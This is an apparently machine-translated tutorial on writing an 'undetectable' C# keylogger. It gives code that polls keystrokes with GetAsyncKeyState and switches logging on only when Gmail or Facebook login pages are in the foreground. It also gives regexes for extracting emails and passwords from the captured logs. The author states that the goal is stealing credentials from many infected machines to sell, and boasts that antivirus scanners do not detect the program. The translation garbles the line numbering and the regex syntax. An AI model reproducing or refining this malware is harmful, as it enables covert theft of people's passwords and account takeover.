How to create your own undetectable smart keylogger

Now i will tell and show you how to create your own keylogger that will not be detected by any of the existing antiviruses. And all this is also free. 

Interesting? Then let's go!

Introduction

A keylogger is software or some kind of physical device that can intercept and remember keystrokes on a compromised machine. Think of this as a digital trap for every keystroke on the keyboard.

Often this function is implemented in other, more complex software, for example, Trojans (Remote Access Trojans RATS), which ensure the delivery of intercepted data back to the attacker. There are also hardware keyloggers, but they are less common because require direct physical access to the machine.

Nevertheless, it is quite easy to program the basic functions of a keylogger. 

Further, this code will not be optimized, I will just show you the lines of code that can accomplish the task, this is not the most elegant or optimal way. And finally, I will not talk about how to make a keylogger resistant to reboots or try to make it completely fingerless thanks to special programming techniques, as well as about protecting against deletion, even if it is found.

Get down to business!

To connect to the keyboard, you only need to use 2 lines in C #:

1. [DllImport ("user32.dll")] 

2. 

3.public static extern int GetAsyncKeyState (Int32 i);

GetAsyncKeyState - This function determines whether a key was pressed or released at the time of the call and whether it was pressed after the previous call. Now we constantly call this function to receive data from the keyboard

1. while (true)

2. {

3. Thread.Sleep (100);

4.for (Int32 i = 0; i <255; i ++)

five. {

6. int state = GetAsyncKeyState (i);

7.if (state == 1 || state == -32767)

8. {

9. Console.WriteLine ((Keys) i);

ten. 

eleven. }

12. }

13. }

What's going on here? This cycle will poll each key every 100ms to determine its state. If one of them is pressed (or was pressed), a message about this will be displayed on the console. In real life, this data is buffered and sent to the hacker, i.e. us.

Smart keylogger:

Wait, is there any point in trying to shoot all the information in a row from all applications?

The code above pulls in raw keyboard input from whatever window and input field is currently the focus. If your goal is credit card numbers and passwords, then this approach is not very effective. For scenarios from the real world, when such keyloggers are executed on hundreds or thousands of machines, the subsequent parsing of data can become very time-consuming and, as a result, become meaningless. information valuable to a cracker may be out of date by that time.

Let's assume that I want to get my hands on Facebook or Gmail credentials to sell likes. Then the new idea is to activate keylogging only when the browser window is active and there is the word Gmail or facebook in the title of the page. By using this method, I increase the chances of getting credentials.

Second version of the code:

1. while (true) 

2. {

3. IntPtr handle = GetForegroundWindow ();

4.if (GetWindowText (handle, buff, chars)> 0)

five. {

6.string line = buff.ToString ();

7. if (line.Contains ("Gmail") || line.Contains ("Facebook - Log In or Sign Up"))

8. {

9. // test the keyboard 

ten. }

eleven. }

12. Thread.Sleep (100);

13. }

This snippet will reveal an active window every 100ms. This is done using the GetForegroundWindow function (more information on MSDN). The page title is stored in the buff variable, if it contains gmail or facebook, then the keyboard scan snippet is called.

By doing this, we ensured that the keyboard was scanned only when the browser window was open on facebook and gmail.

An even smarter keylogger

Let's assume that the hacker was able to get the data with code like ours. Let's also assume that he is ambitious enough and was able to infect tens or hundreds of thousands of cars. Result: a huge file with gigabytes of text, in which the necessary information still needs to be found. It's time to get familiar with regular expressions or regex. This is something like a mini-language for composing certain templates and scanning text for compliance with the given templates.

For simplicity, I will immediately give ready-made expressions that correspond to login names and passwords:

1. // Looking for a postal address

2. ^ [\ w! # $% & '* + \ - / =? \ ^ _ {|} ~] + (\. [\ W! # $% &' * + \ - / =? \ ^ _ {|} ~] +) * @ ((([\ - \ w] + \.) + [a-zA-Z] {2,4}) | (([0-9] {1,3 } \.) {3} [0-9] {1,3})) $

3.  

4.  

5. // Looking for a password

6. (? = ^. {6,} $) (? =. * \ D) (? =. * [A-zA-Z])

These expressions are here as a hint on what can be done using them. With regular expressions, you can search (and find!) Any construct that has a specific and unchanging format, such as passport numbers, credit card numbers, accounts, and even passwords.

Indeed, regular expressions are not the most readable kind of code, but they are one of the programmer's best friends when it comes to parsing text. Java, C #, JavaScript and other popular languages ​​already have ready-made functions to which you can pass regular regular expressions.

For C # it looks like this:

1. Regex re = new Regex (@ "^ [\ w! # $% & Amp; '* + \ - / =? \ ^ _ {|} ~] + (\. [\ W! # $% & Amp; '* + \ - / =? \ ^ _ {|} ~] +) * @ ((([\ - \ w] + \.) + [a-zA-Z] {2,4}) | ( ([0-9] {1,3} \.) {3} [0-9] {1,3})) $ "); 2. Regex re

2 = new Regex (@ "(? = ^. {6,} $) (? =. * \ D) (? =. * [A-zA-Z])"); 

3. string email = "Oded.awask@gmail.com"; 

4. string pass = "abcde3FG"; 

5. Match result = re.Match (email); 

6. Match result2 = re2.Match (pass);

Where the first expression (re) will match any email, and the second (re2) any digit of an alphabetic construction is greater than 6 characters.

Free and no detections

In my example, I used Visual Studio - you can use your favorite environment - to create such a keylogger in 30 minutes.

There is only one question left: will such software really be undetectable for antivirus programs?

I compiled my code and checked the exe file on the Virustotal website. It is a web-based tool that calculates the hash of the file you downloaded and looks for it in a database of known viruses. Surprise! Naturally, nothing was found.

This is the main feature! You can always change the code and develop, being always several steps ahead of threat scanners. If you are able to write your own code, it is almost guaranteed to be undetectable

So that's it